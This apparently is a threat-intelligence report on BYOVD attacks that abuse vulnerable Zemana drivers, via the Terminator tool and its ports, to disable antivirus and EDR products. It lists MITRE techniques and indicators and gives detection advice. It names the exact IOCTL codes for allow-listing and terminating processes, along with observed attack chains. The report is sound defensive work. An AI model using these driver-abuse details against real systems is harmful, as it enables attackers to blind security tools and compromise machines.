Keypoints
- BYOVD (Bring Your Own Vulnerable Driver) attacks drop legitimate vulnerable drivers to escalate to kernel-level privileges and manipulate security tooling.
- Zemana drivers zam64.sys and zamguard64.sys share a vulnerability that lets an attacker add arbitrary processes to the driver’s allow list via IOCTL 0x80002010 and request actions (e.g., process termination) via IOCTL 0x80002048.
- The Terminator tool family (commercial and open-source variants) automates abuse of the Zemana drivers; it has been ported to multiple languages (C#, Nim) and repackaged by threat actors.
- Observed attack chains included exploitation of a Citrix vulnerability, injection into wermgr.exe, attempts to disable Sophos via WMIC, and deployment of a packed ter.exe that unpacks an AES-256‑encrypted payload derived from Terminator code.
- Other incident variants used AuKill/ped.sys when Zemana driver attempts failed; attempts to load drivers and run Terminator variants were often blocked by behavioral protection rules.
- Detection challenges include drivers being legitimate OS components, actors packing/obfuscating tools, and variants being shared on criminal forums and public repos like loldrivers.io.
MITRE Techniques
- [T1215] Kernel Modules and Extensions – Use of legitimate but vulnerable kernel drivers (Zemana zam64.sys / zamguard64.sys) to gain kernel-level privileges and invoke driver functionality (‘…drop known vulnerable drivers on a compromised machine and then exploit the bug(s) to gain kernel-level privileges.’).
- [T1548] Abuse Elevation Control Mechanism – Requirement and use of UAC bypass or administrative privileges to install and abuse vulnerable drivers (‘…would need administrative privileges and a User Account Control (UAC) bypass…’).
- [T1562.001] Impair Defenses: Disable or Modify Tools – Using driver IOCTLs to add attacker processes to allow lists and issue termination requests against AV/EDR processes (‘…send an IOCTL code 0x80002010 … add their own process to the allow list … terminate a targeted process by sending an IOCTL request with code 0x80002048.’).
- [T1190] Exploit Public-Facing Application – Initial access in observed incidents was likely obtained via exploitation of a vulnerable Citrix application (‘initial access was likely obtained via exploiting a vulnerable Citrix application.’).
- [T1059.001] Command and Scripting Interpreter: PowerShell – Use of PowerShell to fetch and execute a script used to install XMRig (cryptominer) from a remote host (‘attempted to execute a PowerShell command to download a text file from a C2 server.’).
Indicators of Compromise
- [Driver filename] driver abused in BYOVD attacks – zam64.sys (Zemana Anti-Logger), zamguard64.sys (Zemana Anti-Malware)
- [Executable / dropped files] attacker binaries and drivers – ter.exe (packed Terminator variant), updatedrv.sys (masquerading Zemana driver path), ped.sys (Process Explorer driver used by AuKill)
- [Tool names / artifacts] offensive tool variants observed – Terminator, SharpTerminator (C# port), Ternimator (Nim port), and CSharpTerminator
- [Repository / listing] known vulnerable driver repository referenced – loldrivers.io (catalog of vulnerable drivers and hashes)
BYOVD attacks drop legitimate vulnerable drivers to exploit inadequate driver-side verification and invoke privileged IOCTL operations. In the Zemana case, both zam64.sys and zamguard64.sys expose an insufficiently validated interface that maintains an allow list; an attacker with administrative rights can send IOCTL 0x80002010 with a target PID to add a malicious process to that allow list, then issue IOCTL 0x80002048 to attempt termination of AV/EDR processes. Exploitation therefore requires either administrative/UAC bypass or social engineering to install the driver, and attackers commonly pack or obfuscate payloads to evade static detections.
Adversaries have automated these steps in tools like Terminator and its forks (SharpTerminator, Ternimator), which have been repackaged and modified (e.g., ter.exe unpacks an AES-256 encrypted BINARY resource using a hardcoded key and reveals a PDB path referencing “Terminator-master”). Observed chains included exploitation of a Citrix application, code injection into wermgr.exe, failed WMIC attempts to stop Sophos services, dropping the vulnerable driver, and executing a modified Terminator; when Zemana attempts failed, actors reverted to other EDR killers such as AuKill using ped.sys.
Defenders should focus on detecting the behavioral stages: exploitation and initial access (e.g., Citrix exploits), injection/execution (packed unpacking routines, AES-decrypted payloads), driver drop/load attempts, and IOCTL abuse (requests to add processes to allow lists or terminate protected processes). Behavioral protections successfully blocked several driver loads and PowerShell-based XMRig download attempts; additional mitigations include enabling tamper protection, tracking and blocklisting unused vulnerable drivers, and adding driver checks into vulnerability management programs.